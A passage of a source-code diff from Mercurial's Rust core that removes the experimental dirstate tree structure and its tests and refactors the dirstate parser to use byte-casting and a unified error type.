- Directory(Directory), - File(File), -} - -#[derive(Debug, Default, Clone, PartialEq)] -pub struct Node { - pub kind: NodeKind, -} - -impl Default for NodeKind { - fn default() -> Self { - NodeKind::Directory(Default::default()) - } -} - -impl Node { - pub fn insert( - &mut self, - path: &[u8], - new_entry: DirstateEntry, - ) -> InsertResult { - let mut split = path.splitn(2, |&c| c == b'/'); - let head = split.next().unwrap_or(b""); - let tail = split.next().unwrap_or(b""); - - // Are we're modifying the current file ? 
Is the the end of the path ? - let is_current_file = tail.is_empty() && head.is_empty(); - - // Potentially Replace the current file with a directory if it's marked - // as `Removed` - if !is_current_file { - if let NodeKind::File(file) = &mut self.kind { - if file.entry.state == EntryState::Removed { - self.kind = NodeKind::Directory(Directory { - was_file: Some(Box::from(file.clone())), - children: Default::default(), - }) - } - } - } - match &mut self.kind { - NodeKind::Directory(directory) => { - Node::insert_in_directory(directory, new_entry, head, tail) - } - NodeKind::File(file) => { - if is_current_file { - let new = Self { - kind: NodeKind::File(File { - entry: new_entry, - ..file.clone() - }), - }; - InsertResult { - did_insert: false, - old_entry: Some(std::mem::replace(self, new)), - } - } else { - match file.entry.state { - EntryState::Removed => { - unreachable!("Removed file turning into a directory was dealt with earlier") - } - _ => { - Node::insert_in_file( - file, new_entry, head, tail, - ) - } - } - } - } - } - } - - /// The current file still exists and is not marked as `Removed`. - /// Insert the entry in its `was_directory`. 
- fn insert_in_file( - file: &mut File, - new_entry: DirstateEntry, - head: &[u8], - tail: &[u8], - ) -> InsertResult { - if let Some(d) = &mut file.was_directory { - Node::insert_in_directory(d, new_entry, head, tail) - } else { - let mut dir = Directory { - was_file: None, - children: FastHashMap::default(), - }; - let res = - Node::insert_in_directory(&mut dir, new_entry, head, tail); - file.was_directory = Some(Box::new(dir)); - res - } - } - - /// Insert an entry in the subtree of `directory` - fn insert_in_directory( - directory: &mut Directory, - new_entry: DirstateEntry, - head: &[u8], - tail: &[u8], - ) -> InsertResult { - let mut res = InsertResult::default(); - - if let Some(node) = directory.children.get_mut(head) { - // Node exists - match &mut node.kind { - NodeKind::Directory(subdir) => { - if tail.is_empty() { - let becomes_file = Self { - kind: NodeKind::File(File { - was_directory: Some(Box::from(subdir.clone())), - entry: new_entry, - }), - }; - let old_entry = directory - .children - .insert(head.to_owned(), becomes_file); - return InsertResult { - did_insert: true, - old_entry, - }; - } else { - res = node.insert(tail, new_entry); - } - } - NodeKind::File(_) => { - res = node.insert(tail, new_entry); - } - } - } else if tail.is_empty() { - // File does not already exist - directory.children.insert( - head.to_owned(), - Self { - kind: NodeKind::File(File { - was_directory: None, - entry: new_entry, - }), - }, - ); - res.did_insert = true; - } else { - // Directory does not already exist - let mut nested = Self { - kind: NodeKind::Directory(Directory { - was_file: None, - children: Default::default(), - }), - }; - res = nested.insert(tail, new_entry); - directory.children.insert(head.to_owned(), nested); - } - res - } - - /// Removes an entry from the tree, returns a `RemoveResult`. 
- pub fn remove(&mut self, path: &[u8]) -> RemoveResult { - let empty_result = RemoveResult::default(); - if path.is_empty() { - return empty_result; - } - let mut split = path.splitn(2, |&c| c == b'/'); - let head = split.next(); - let tail = split.next().unwrap_or(b""); - - let head = match head { - None => { - return empty_result; - } - Some(h) => h, - }; - if head == path { - match &mut self.kind { - NodeKind::Directory(d) => { - return Node::remove_from_directory(head, d); - } - NodeKind::File(f) => { - if let Some(d) = &mut f.was_directory { - let RemoveResult { old_entry, .. } = - Node::remove_from_directory(head, d); - return RemoveResult { - cleanup: false, - old_entry, - }; - } - } - } - empty_result - } else { - // Look into the dirs - match &mut self.kind { - NodeKind::Directory(d) => { - if let Some(child) = d.children.get_mut(head) { - let mut res = child.remove(tail); - if res.cleanup { - d.children.remove(head); - } - res.cleanup = - d.children.is_empty() && d.was_file.is_none(); - res - } else { - empty_result - } - } - NodeKind::File(f) => { - if let Some(d) = &mut f.was_directory { - if let Some(child) = d.children.get_mut(head) { - let RemoveResult { cleanup, old_entry } = - child.remove(tail); - if cleanup { - d.children.remove(head); - } - if d.children.is_empty() && d.was_file.is_none() { - f.was_directory = None; - } - - return RemoveResult { - cleanup: false, - old_entry, - }; - } - } - empty_result - } - } - } - } - - fn remove_from_directory(head: &[u8], d: &mut Directory) -> RemoveResult { - if let Some(node) = d.children.get_mut(head) { - return match &mut node.kind { - NodeKind::Directory(d) => { - if let Some(f) = &mut d.was_file { - let entry = f.entry; - d.was_file = None; - RemoveResult { - cleanup: false, - old_entry: Some(entry), - } - } else { - RemoveResult::default() - } - } - NodeKind::File(f) => { - let entry = f.entry; - let mut cleanup = false; - match &f.was_directory { - None => { - if d.children.len() == 1 { - cleanup = 
true; - } - d.children.remove(head); - } - Some(dir) => { - node.kind = NodeKind::Directory(*dir.clone()); - } - } - - RemoveResult { - cleanup, - old_entry: Some(entry), - } - } - }; - } - RemoveResult::default() - } - - pub fn get(&self, path: &[u8]) -> Option<&Node> { - if path.is_empty() { - return Some(&self); - } - let mut split = path.splitn(2, |&c| c == b'/'); - let head = split.next(); - let tail = split.next().unwrap_or(b""); - - let head = match head { - None => { - return Some(&self); - } - Some(h) => h, - }; - match &self.kind { - NodeKind::Directory(d) => { - if let Some(child) = d.children.get(head) { - return child.get(tail); - } - } - NodeKind::File(f) => { - if let Some(d) = &f.was_directory { - if let Some(child) = d.children.get(head) { - return child.get(tail); - } - } - } - } - - None - } - - pub fn get_mut(&mut self, path: &[u8]) -> Option<&mut NodeKind> { - if path.is_empty() { - return Some(&mut self.kind); - } - let mut split = path.splitn(2, |&c| c == b'/'); - let head = split.next(); - let tail = split.next().unwrap_or(b""); - - let head = match head { - None => { - return Some(&mut self.kind); - } - Some(h) => h, - }; - match &mut self.kind { - NodeKind::Directory(d) => { - if let Some(child) = d.children.get_mut(head) { - return child.get_mut(tail); - } - } - NodeKind::File(f) => { - if let Some(d) = &mut f.was_directory { - if let Some(child) = d.children.get_mut(head) { - return child.get_mut(tail); - } - } - } - } - - None - } - - pub fn iter(&self) -> Iter { - Iter::new(self) - } -} - -/// Information returned to the caller of an `insert` operation for integrity. -#[derive(Debug, Default)] -pub struct InsertResult { - /// Whether the insertion resulted in an actual insertion and not an - /// update - pub(super) did_insert: bool, - /// The entry that was replaced, if it exists - pub(super) old_entry: Option<Node>, -} - -/// Information returned to the caller of a `remove` operation integrity. 
-#[derive(Debug, Default)] -pub struct RemoveResult { - /// If the caller needs to remove the current node - pub(super) cleanup: bool, - /// The entry that was replaced, if it exists - pub(super) old_entry: Option<DirstateEntry>, -} - -impl<'a> IntoIterator for &'a Node { - type Item = (HgPathBuf, DirstateEntry); - type IntoIter = Iter<'a>; - - fn into_iter(self) -> Self::IntoIter { - self.iter() - } -} diff --git a/rust/hg-core/src/dirstate/dirstate_tree/tree.rs b/rust/hg-core/src/dirstate/dirstate_tree/tree.rs deleted file mode 100644 --- a/rust/hg-core/src/dirstate/dirstate_tree/tree.rs +++ /dev/null @@ -1,682 +0,0 @@ -// tree.rs -// -// Copyright 2020, Raphaël Gomès <rgomes@octobus.net> -// -// This software may be used and distributed according to the terms of the -// GNU General Public License version 2 or any later version. - -use super::iter::Iter; -use super::node::{Directory, Node, NodeKind}; -use crate::dirstate::dirstate_tree::iter::FsIter; -use crate::dirstate::dirstate_tree::node::{InsertResult, RemoveResult}; -use crate::utils::hg_path::{HgPath, HgPathBuf}; -use crate::DirstateEntry; -use std::path::PathBuf; - -/// A specialized tree to represent the Mercurial dirstate. -/// -/// # Advantages over a flat structure -/// -/// The dirstate is inherently hierarchical, since it's a representation of the -/// file structure of the project. The current dirstate format is flat, and -/// while that affords us potentially great (unordered) iteration speeds, the -/// need to retrieve a given path is great enough that you need some kind of -/// hashmap or tree in a lot of cases anyway. 
-/// -/// Going with a tree allows us to be smarter: -/// - Skipping an ignored directory means we don't visit its entire subtree -/// - Security auditing does not need to reconstruct paths backwards to check -/// for symlinked directories, this can be done during the iteration in a -/// very efficient fashion -/// - We don't need to build the directory information in another struct, -/// simplifying the code a lot, reducing the memory footprint and -/// potentially going faster depending on the implementation. -/// - We can use it to store a (platform-dependent) caching mechanism [1] -/// - And probably other types of optimizations. -/// -/// Only the first two items in this list are implemented as of this commit. -/// -/// [1]: https://www.mercurial-scm.org/wiki/DirsCachePlan -/// -/// -/// # Structure -/// -/// It's a prefix (radix) tree with no fixed arity, with a granularity of a -/// folder, allowing it to mimic a filesystem hierarchy: -/// -/// ```text -/// foo/bar -/// foo/baz -/// test -/// ``` -/// Will be represented (simplified) by: -/// -/// ```text -/// Directory(root): -/// - File("test") -/// - Directory("foo"): -/// - File("bar") -/// - File("baz") -/// ``` -/// -/// Moreover, it is special-cased for storing the dirstate and as such handles -/// cases that a simple `HashMap` would handle, but while preserving the -/// hierarchy. -/// For example: -/// -/// ```shell -/// $ touch foo -/// $ hg add foo -/// $ hg commit -m "foo" -/// $ hg remove foo -/// $ rm foo -/// $ mkdir foo -/// $ touch foo/a -/// $ hg add foo/a -/// $ hg status -/// R foo -/// A foo/a -/// ``` -/// To represent this in a tree, one needs to keep track of whether any given -/// file was a directory and whether any given directory was a file at the last -/// dirstate update. 
This tree stores that information, but only in the right -/// circumstances by respecting the high-level rules that prevent nonsensical -/// structures to exist: -/// - a file can only be added as a child of another file if the latter is -/// marked as `Removed` -/// - a file cannot replace a folder unless all its descendents are removed -/// -/// This second rule is not checked by the tree for performance reasons, and -/// because high-level logic already prevents that state from happening. -/// -/// # Ordering -/// -/// It makes no guarantee of ordering for now. -#[derive(Debug, Default, Clone, PartialEq)] -pub struct Tree { - pub root: Node, - files_count: usize, -} - -impl Tree { - pub fn new() -> Self { - Self { - root: Node { - kind: NodeKind::Directory(Directory { - was_file: None, - children: Default::default(), - }), - }, - files_count: 0, - } - } - - /// How many files (not directories) are stored in the tree, including ones - /// marked as `Removed`. - pub fn len(&self) -> usize { - self.files_count - } - - pub fn is_empty(&self) -> bool { - self.len() == 0 - } - - /// Inserts a file in the tree and returns the previous entry if any. - pub fn insert( - &mut self, - path: impl AsRef<HgPath>, - kind: DirstateEntry, - ) -> Option<DirstateEntry> { - let old = self.insert_node(path, kind); - match old?.kind { - NodeKind::Directory(_) => None, - NodeKind::File(f) => Some(f.entry), - } - } - - /// Low-level insertion method that returns the previous node (directories - /// included). - fn insert_node( - &mut self, - path: impl AsRef<HgPath>, - kind: DirstateEntry, - ) -> Option<Node> { - let InsertResult { - did_insert, - old_entry, - } = self.root.insert(path.as_ref().as_bytes(), kind); - self.files_count += if did_insert { 1 } else { 0 }; - old_entry - } - - /// Returns a reference to a node if it exists. 
- pub fn get_node(&self, path: impl AsRef<HgPath>) -> Option<&Node> { - self.root.get(path.as_ref().as_bytes()) - } - - /// Returns a reference to the entry corresponding to `path` if it exists. - pub fn get(&self, path: impl AsRef<HgPath>) -> Option<&DirstateEntry> { - if let Some(node) = self.get_node(&path) { - return match &node.kind { - NodeKind::Directory(d) => { - d.was_file.as_ref().map(|f| &f.entry) - } - NodeKind::File(f) => Some(&f.entry), - }; - } - None - } - - /// Returns `true` if an entry is found for the given `path`. - pub fn contains_key(&self, path: impl AsRef<HgPath>) -> bool { - self.get(path).is_some() - } - - /// Returns a mutable reference to the entry corresponding to `path` if it - /// exists. - pub fn get_mut( - &mut self, - path: impl AsRef<HgPath>, - ) -> Option<&mut DirstateEntry> { - if let Some(kind) = self.root.get_mut(path.as_ref().as_bytes()) { - return match kind { - NodeKind::Directory(d) => { - d.was_file.as_mut().map(|f| &mut f.entry) - } - NodeKind::File(f) => Some(&mut f.entry), - }; - } - None - } - - /// Returns an iterator over the paths and corresponding entries in the - /// tree. - pub fn iter(&self) -> Iter { - Iter::new(&self.root) - } - - /// Returns an iterator of all entries in the tree, with a special - /// filesystem handling for the directories containing said entries. See - /// the documentation of `FsIter` for more. - pub fn fs_iter(&self, root_dir: PathBuf) -> FsIter { - FsIter::new(&self.root, root_dir) - } - - /// Remove the entry at `path` and returns it, if it exists. - pub fn remove( - &mut self, - path: impl AsRef<HgPath>, - ) -> Option<DirstateEntry> { - let RemoveResult { old_entry, .. 
} = - self.root.remove(path.as_ref().as_bytes()); - self.files_count = self - .files_count - .checked_sub(if old_entry.is_some() { 1 } else { 0 }) - .expect("removed too many files"); - old_entry - } -} - -impl<P: AsRef<HgPath>> Extend<(P, DirstateEntry)> for Tree { - fn extend<T: IntoIterator<Item = (P, DirstateEntry)>>(&mut self, iter: T) { - for (path, entry) in iter { - self.insert(path, entry); - } - } -} - -impl<'a> IntoIterator for &'a Tree { - type Item = (HgPathBuf, DirstateEntry); - type IntoIter = Iter<'a>; - - fn into_iter(self) -> Self::IntoIter { - self.iter() - } -} - -#[cfg(test)] -mod tests { - use super::*; - use crate::dirstate::dirstate_tree::node::File; - use crate::{EntryState, FastHashMap}; - use pretty_assertions::assert_eq; - - impl Node { - /// Shortcut for getting children of a node in tests. - fn children(&self) -> Option<&FastHashMap<Vec<u8>, Node>> { - match &self.kind { - NodeKind::Directory(d) => Some(&d.children), - NodeKind::File(_) => None, - } - } - } - - #[test] - fn test_dirstate_tree() { - let mut tree = Tree::new(); - - assert_eq!( - tree.insert_node( - HgPath::new(b"we/p"), - DirstateEntry { - state: EntryState::Normal, - mode: 0, - mtime: 0, - size: 0 - } - ), - None - ); - dbg!(&tree); - assert!(tree.get_node(HgPath::new(b"we")).is_some()); - let entry = DirstateEntry { - state: EntryState::Merged, - mode: 41, - mtime: 42, - size: 43, - }; - assert_eq!(tree.insert_node(HgPath::new(b"foo/bar"), entry), None); - assert_eq!( - tree.get_node(HgPath::new(b"foo/bar")), - Some(&Node { - kind: NodeKind::File(File { - was_directory: None, - entry - }) - }) - ); - // We didn't override the first entry we made - assert!(tree.get_node(HgPath::new(b"we")).is_some(),); - // Inserting the same key again - assert_eq!( - tree.insert_node(HgPath::new(b"foo/bar"), entry), - Some(Node { - kind: NodeKind::File(File { - was_directory: None, - entry - }), - }) - ); - // Inserting the two levels deep - 
assert_eq!(tree.insert_node(HgPath::new(b"foo/bar/baz"), entry), None); - // Getting a file "inside a file" should return `None` - assert_eq!(tree.get_node(HgPath::new(b"foo/bar/baz/bap"),), None); - - assert_eq!( - tree.insert_node(HgPath::new(b"wasdir/subfile"), entry), - None, - ); - let removed_entry = DirstateEntry { - state: EntryState::Removed, - mode: 0, - mtime: 0, - size: 0, - }; - assert!(tree - .insert_node(HgPath::new(b"wasdir"), removed_entry) - .is_some()); - - assert_eq!( - tree.get_node(HgPath::new(b"wasdir")), - Some(&Node { - kind: NodeKind::File(File { - was_directory: Some(Box::new(Directory { - was_file: None, - children: [( - b"subfile".to_vec(), - Node { - kind: NodeKind::File(File { - was_directory: None, - entry, - }) - } - )] - .to_vec() - .into_iter() - .collect() - })), - entry: removed_entry - }) - }) - ); - - assert!(tree.get(HgPath::new(b"wasdir/subfile")).is_some()) - } - - #[test] - fn test_insert_removed() { - let mut tree = Tree::new(); - let entry = DirstateEntry { - state: EntryState::Merged, - mode: 1, - mtime: 2, - size: 3, - }; - let removed_entry = DirstateEntry { - state: EntryState::Removed, - mode: 10, - mtime: 20, - size: 30, - }; - assert_eq!(tree.insert_node(HgPath::new(b"foo"), entry), None); - assert_eq!( - tree.insert_node(HgPath::new(b"foo/a"), removed_entry), - None - ); - // The insert should not turn `foo` into a directory as `foo` is not - // `Removed`. - match tree.get_node(HgPath::new(b"foo")).unwrap().kind { - NodeKind::Directory(_) => panic!("should be a file"), - NodeKind::File(_) => {} - } - - let mut tree = Tree::new(); - let entry = DirstateEntry { - state: EntryState::Merged, - mode: 1, - mtime: 2, - size: 3, - }; - let removed_entry = DirstateEntry { - state: EntryState::Removed, - mode: 10, - mtime: 20, - size: 30, - }; - // The insert *should* turn `foo` into a directory as it is `Removed`. 
- assert_eq!(tree.insert_node(HgPath::new(b"foo"), removed_entry), None); - assert_eq!(tree.insert_node(HgPath::new(b"foo/a"), entry), None); - match tree.get_node(HgPath::new(b"foo")).unwrap().kind { - NodeKind::Directory(_) => {} - NodeKind::File(_) => panic!("should be a directory"), - } - } - - #[test] - fn test_get() { - let mut tree = Tree::new(); - let entry = DirstateEntry { - state: EntryState::Merged, - mode: 1, - mtime: 2, - size: 3, - }; - assert_eq!(tree.insert_node(HgPath::new(b"a/b/c"), entry), None); - assert_eq!(tree.files_count, 1); - assert_eq!(tree.get(HgPath::new(b"a/b/c")), Some(&entry)); - assert_eq!(tree.get(HgPath::new(b"a/b")), None); - assert_eq!(tree.get(HgPath::new(b"a")), None); - assert_eq!(tree.get(HgPath::new(b"a/b/c/d")), None); - let entry2 = DirstateEntry { - state: EntryState::Removed, - mode: 0, - mtime: 5, - size: 1, - }; - // was_directory - assert_eq!(tree.insert(HgPath::new(b"a/b"), entry2), None); - assert_eq!(tree.files_count, 2); - assert_eq!(tree.get(HgPath::new(b"a/b")), Some(&entry2)); - assert_eq!(tree.get(HgPath::new(b"a/b/c")), Some(&entry)); - - let mut tree = Tree::new(); - - // was_file - assert_eq!(tree.insert_node(HgPath::new(b"a"), entry), None); - assert_eq!(tree.files_count, 1); - assert_eq!(tree.insert_node(HgPath::new(b"a/b"), entry2), None); - assert_eq!(tree.files_count, 2); - assert_eq!(tree.get(HgPath::new(b"a/b")), Some(&entry2)); - } - - #[test] - fn test_get_mut() { - let mut tree = Tree::new(); - let mut entry = DirstateEntry { - state: EntryState::Merged, - mode: 1, - mtime: 2, - size: 3, - }; - assert_eq!(tree.insert_node(HgPath::new(b"a/b/c"), entry), None); - assert_eq!(tree.files_count, 1); - assert_eq!(tree.get_mut(HgPath::new(b"a/b/c")), Some(&mut entry)); - assert_eq!(tree.get_mut(HgPath::new(b"a/b")), None); - assert_eq!(tree.get_mut(HgPath::new(b"a")), None); - assert_eq!(tree.get_mut(HgPath::new(b"a/b/c/d")), None); - let mut entry2 = DirstateEntry { - state: EntryState::Removed, - 
mode: 0, - mtime: 5, - size: 1, - }; - // was_directory - assert_eq!(tree.insert(HgPath::new(b"a/b"), entry2), None); - assert_eq!(tree.files_count, 2); - assert_eq!(tree.get_mut(HgPath::new(b"a/b")), Some(&mut entry2)); - assert_eq!(tree.get_mut(HgPath::new(b"a/b/c")), Some(&mut entry)); - - let mut tree = Tree::new(); - - // was_file - assert_eq!(tree.insert_node(HgPath::new(b"a"), entry), None); - assert_eq!(tree.files_count, 1); - assert_eq!(tree.insert_node(HgPath::new(b"a/b"), entry2), None); - assert_eq!(tree.files_count, 2); - assert_eq!(tree.get_mut(HgPath::new(b"a/b")), Some(&mut entry2)); - } - - #[test] - fn test_remove() { - let mut tree = Tree::new(); - assert_eq!(tree.files_count, 0); - assert_eq!(tree.remove(HgPath::new(b"foo")), None); - assert_eq!(tree.files_count, 0); - - let entry = DirstateEntry { - state: EntryState::Normal, - mode: 0, - mtime: 0, - size: 0, - }; - assert_eq!(tree.insert_node(HgPath::new(b"a/b/c"), entry), None); - assert_eq!(tree.files_count, 1); - - assert_eq!(tree.remove(HgPath::new(b"a/b/c")), Some(entry)); - assert_eq!(tree.files_count, 0); - - assert_eq!(tree.insert_node(HgPath::new(b"a/b/x"), entry), None); - assert_eq!(tree.insert_node(HgPath::new(b"a/b/y"), entry), None); - assert_eq!(tree.insert_node(HgPath::new(b"a/b/z"), entry), None); - assert_eq!(tree.insert_node(HgPath::new(b"x"), entry), None); - assert_eq!(tree.insert_node(HgPath::new(b"y"), entry), None); - assert_eq!(tree.files_count, 5); - - assert_eq!(tree.remove(HgPath::new(b"a/b/x")), Some(entry)); - assert_eq!(tree.files_count, 4); - assert_eq!(tree.remove(HgPath::new(b"a/b/x")), None); - assert_eq!(tree.files_count, 4); - assert_eq!(tree.remove(HgPath::new(b"a/b/y")), Some(entry)); - assert_eq!(tree.files_count, 3); - assert_eq!(tree.remove(HgPath::new(b"a/b/z")), Some(entry)); - assert_eq!(tree.files_count, 2); - - assert_eq!(tree.remove(HgPath::new(b"x")), Some(entry)); - assert_eq!(tree.files_count, 1); - assert_eq!(tree.remove(HgPath::new(b"y")), 
Some(entry)); - assert_eq!(tree.files_count, 0); - - // `a` should have been cleaned up, no more files anywhere in its - // descendents - assert_eq!(tree.get_node(HgPath::new(b"a")), None); - assert_eq!(tree.root.children().unwrap().len(), 0); - - let removed_entry = DirstateEntry { - state: EntryState::Removed, - ..entry - }; - assert_eq!(tree.insert(HgPath::new(b"a"), removed_entry), None); - assert_eq!(tree.insert_node(HgPath::new(b"a/b/x"), entry), None); - assert_eq!(tree.files_count, 2); - dbg!(&tree); - assert_eq!(tree.remove(HgPath::new(b"a")), Some(removed_entry)); - assert_eq!(tree.files_count, 1); - dbg!(&tree); - assert_eq!(tree.remove(HgPath::new(b"a/b/x")), Some(entry)); - assert_eq!(tree.files_count, 0); - - // The entire tree should have been cleaned up, no more files anywhere - // in its descendents - assert_eq!(tree.root.children().unwrap().len(), 0); - - let removed_entry = DirstateEntry { - state: EntryState::Removed, - ..entry - }; - assert_eq!(tree.insert(HgPath::new(b"a"), entry), None); - assert_eq!( - tree.insert_node(HgPath::new(b"a/b/x"), removed_entry), - None - ); - assert_eq!(tree.files_count, 2); - dbg!(&tree); - assert_eq!(tree.remove(HgPath::new(b"a")), Some(entry)); - assert_eq!(tree.files_count, 1); - dbg!(&tree); - assert_eq!(tree.remove(HgPath::new(b"a/b/x")), Some(removed_entry)); - assert_eq!(tree.files_count, 0); - - dbg!(&tree); - // The entire tree should have been cleaned up, no more files anywhere - // in its descendents - assert_eq!(tree.root.children().unwrap().len(), 0); - - assert_eq!(tree.insert(HgPath::new(b"d"), entry), None); - assert_eq!(tree.insert(HgPath::new(b"d/d/d"), entry), None); - assert_eq!(tree.files_count, 2); - - // Deleting the nested file should not delete the top directory as it - // used to be a file - assert_eq!(tree.remove(HgPath::new(b"d/d/d")), Some(entry)); - assert_eq!(tree.files_count, 1); - assert!(tree.get_node(HgPath::new(b"d")).is_some()); - 
assert!(tree.remove(HgPath::new(b"d")).is_some()); - assert_eq!(tree.files_count, 0); - - // Deleting the nested file should not delete the top file (other way - // around from the last case) - assert_eq!(tree.insert(HgPath::new(b"a/a"), entry), None); - assert_eq!(tree.files_count, 1); - assert_eq!(tree.insert(HgPath::new(b"a"), entry), None); - assert_eq!(tree.files_count, 2); - dbg!(&tree); - assert_eq!(tree.remove(HgPath::new(b"a/a")), Some(entry)); - assert_eq!(tree.files_count, 1); - dbg!(&tree); - assert!(tree.get_node(HgPath::new(b"a")).is_some()); - assert!(tree.get_node(HgPath::new(b"a/a")).is_none()); - } - - #[test] - fn test_was_directory() { - let mut tree = Tree::new(); - - let entry = DirstateEntry { - state: EntryState::Removed, - mode: 0, - mtime: 0, - size: 0, - }; - assert_eq!(tree.insert_node(HgPath::new(b"a/b/c"), entry), None); - assert_eq!(tree.files_count, 1); - - assert!(tree.insert_node(HgPath::new(b"a"), entry).is_some()); - let new_a = tree.root.children().unwrap().get(&b"a".to_vec()).unwrap(); - - match &new_a.kind { - NodeKind::Directory(_) => panic!(), - NodeKind::File(f) => { - let dir = f.was_directory.clone().unwrap(); - let c = dir - .children - .get(&b"b".to_vec()) - .unwrap() - .children() - .unwrap() - .get(&b"c".to_vec()) - .unwrap(); - - assert_eq!( - match &c.kind { - NodeKind::Directory(_) => panic!(), - NodeKind::File(f) => f.entry, - }, - entry - ); - } - } - assert_eq!(tree.files_count, 2); - dbg!(&tree); - assert_eq!(tree.remove(HgPath::new(b"a/b/c")), Some(entry)); - assert_eq!(tree.files_count, 1); - dbg!(&tree); - let a = tree.get_node(HgPath::new(b"a")).unwrap(); - match &a.kind { - NodeKind::Directory(_) => panic!(), - NodeKind::File(f) => { - // Directory in `was_directory` was emptied, should be removed - assert_eq!(f.was_directory, None); - } - } - } - #[test] - fn test_extend() { - let insertions = [ - ( - HgPathBuf::from_bytes(b"d"), - DirstateEntry { - state: EntryState::Added, - mode: 0, - mtime: -1, - 
size: -1, - }, - ), - ( - HgPathBuf::from_bytes(b"b"), - DirstateEntry { - state: EntryState::Normal, - mode: 33188, - mtime: 1599647984, - size: 2, - }, - ), - ( - HgPathBuf::from_bytes(b"a/a"), - DirstateEntry { - state: EntryState::Normal, - mode: 33188, - mtime: 1599647984, - size: 2, - }, - ), - ( - HgPathBuf::from_bytes(b"d/d/d"), - DirstateEntry { - state: EntryState::Removed, - mode: 0, - mtime: 0, - size: 0, - }, - ), - ] - .to_vec(); - let mut tree = Tree::new(); - - tree.extend(insertions.clone().into_iter()); - - for (path, _) in &insertions { - assert!(tree.contains_key(path), true); - } - assert_eq!(tree.files_count, 4); - } -} diff --git a/rust/hg-core/src/dirstate/parsers.rs b/rust/hg-core/src/dirstate/parsers.rs --- a/rust/hg-core/src/dirstate/parsers.rs +++ b/rust/hg-core/src/dirstate/parsers.rs @@ -3,15 +3,16 @@ // This software may be used and distributed according to the terms of the // GNU General Public License version 2 or any later version. +use crate::errors::HgError; use crate::utils::hg_path::HgPath; use crate::{ - dirstate::{CopyMap, EntryState, StateMap}, - DirstateEntry, DirstatePackError, DirstateParents, DirstateParseError, + dirstate::{CopyMap, EntryState, RawEntry, StateMap}, + DirstateEntry, DirstateParents, }; -use byteorder::{BigEndian, ReadBytesExt, WriteBytesExt}; +use byteorder::{BigEndian, WriteBytesExt}; +use bytes_cast::BytesCast; use micro_timer::timed; use std::convert::{TryFrom, TryInto}; -use std::io::Cursor; use std::time::Duration; /// Parents are stored in the dirstate as byte hashes. 
@@ -20,77 +21,64 @@ const MIN_ENTRY_SIZE: usize = 17; type ParseResult<'a> = ( - DirstateParents, + &'a DirstateParents, Vec<(&'a HgPath, DirstateEntry)>, Vec<(&'a HgPath, &'a HgPath)>, ); -#[timed] -pub fn parse_dirstate( +pub fn parse_dirstate_parents( contents: &[u8], -) -> Result<ParseResult, DirstateParseError> { - if contents.len() < PARENT_SIZE * 2 { - return Err(DirstateParseError::TooLittleData); - } - let mut copies = vec![]; - let mut entries = vec![]; +) -> Result<&DirstateParents, HgError> { + let (parents, _rest) = DirstateParents::from_bytes(contents) + .map_err(|_| HgError::corrupted("Too little data for dirstate."))?; + Ok(parents) +} - let mut curr_pos = PARENT_SIZE * 2; - let parents = DirstateParents { - p1: contents[..PARENT_SIZE].try_into().unwrap(), - p2: contents[PARENT_SIZE..curr_pos].try_into().unwrap(), - }; +#[timed] +pub fn parse_dirstate(mut contents: &[u8]) -> Result<ParseResult, HgError> { + let mut copies = Vec::new(); + let mut entries = Vec::new(); - while curr_pos < contents.len() { - if curr_pos + MIN_ENTRY_SIZE > contents.len() { - return Err(DirstateParseError::Overflow); - } - let entry_bytes = &contents[curr_pos..]; + let (parents, rest) = DirstateParents::from_bytes(contents) + .map_err(|_| HgError::corrupted("Too little data for dirstate."))?; + contents = rest; + while !contents.is_empty() { + let (raw_entry, rest) = RawEntry::from_bytes(contents) + .map_err(|_| HgError::corrupted("Overflow in dirstate."))?; - let mut cursor = Cursor::new(entry_bytes); - let state = EntryState::try_from(cursor.read_u8()?)?; - let mode = cursor.read_i32::<BigEndian>()?; - let size = cursor.read_i32::<BigEndian>()?; - let mtime = cursor.read_i32::<BigEndian>()?; - let path_len = cursor.read_i32::<BigEndian>()? 
as usize; + let entry = DirstateEntry { + state: EntryState::try_from(raw_entry.state)?, + mode: raw_entry.mode.get(), + mtime: raw_entry.mtime.get(), + size: raw_entry.size.get(), + }; + let (paths, rest) = + u8::slice_from_bytes(rest, raw_entry.length.get() as usize) + .map_err(|_| HgError::corrupted("Overflow in dirstate."))?; - if path_len > contents.len() - curr_pos { - return Err(DirstateParseError::Overflow); + // `paths` is either a single path, or two paths separated by a NULL + // byte + let mut iter = paths.splitn(2, |&byte| byte == b'\0'); + let path = HgPath::new( + iter.next().expect("splitn always yields at least one item"), + ); + if let Some(copy_source) = iter.next() { + copies.push((path, HgPath::new(copy_source))); } - // Slice instead of allocating a Vec needed for `read_exact` - let path = &entry_bytes[MIN_ENTRY_SIZE..MIN_ENTRY_SIZE + (path_len)]; - - let (path, copy) = match memchr::memchr(0, path) { - None => (path, None), - Some(i) => (&path[..i], Some(&path[(i + 1)..])), - }; - - if let Some(copy_path) = copy { - copies.push((HgPath::new(path), HgPath::new(copy_path))); - }; - entries.push(( - HgPath::new(path), - DirstateEntry { - state, - mode, - size, - mtime, - }, - )); - curr_pos = curr_pos + MIN_ENTRY_SIZE + (path_len); + entries.push((path, entry)); + contents = rest; } Ok((parents, entries, copies)) } /// `now` is the duration in seconds since the Unix epoch -#[cfg(not(feature = "dirstate-tree"))] pub fn pack_dirstate( state_map: &mut StateMap, copy_map: &CopyMap, parents: DirstateParents, now: Duration, -) -> Result<Vec<u8>, DirstatePackError> { +) -> Result<Vec<u8>, HgError> { // TODO move away from i32 before 2038. 
let now: i32 = now.as_secs().try_into().expect("time overflow"); @@ -108,8 +96,8 @@ let mut packed = Vec::with_capacity(expected_size); - packed.extend(&parents.p1); - packed.extend(&parents.p2); + packed.extend(parents.p1.as_bytes()); + packed.extend(parents.p2.as_bytes()); for (filename, entry) in state_map.iter_mut() { let new_filename = filename.to_owned(); @@ -136,93 +124,27 @@ new_filename.extend(copy.bytes()); } - packed.write_u8(entry.state.into())?; - packed.write_i32::<BigEndian>(entry.mode)?; - packed.write_i32::<BigEndian>(entry.size)?; - packed.write_i32::<BigEndian>(new_mtime)?; - packed.write_i32::<BigEndian>(new_filename.len() as i32)?; + // Unwrapping because `impl std::io::Write for Vec<u8>` never errors + packed.write_u8(entry.state.into()).unwrap(); + packed.write_i32::<BigEndian>(entry.mode).unwrap(); + packed.write_i32::<BigEndian>(entry.size).unwrap(); + packed.write_i32::<BigEndian>(new_mtime).unwrap(); + packed + .write_i32::<BigEndian>(new_filename.len() as i32) + .unwrap(); packed.extend(new_filename) } if packed.len() != expected_size { - return Err(DirstatePackError::BadSize(expected_size, packed.len())); + return 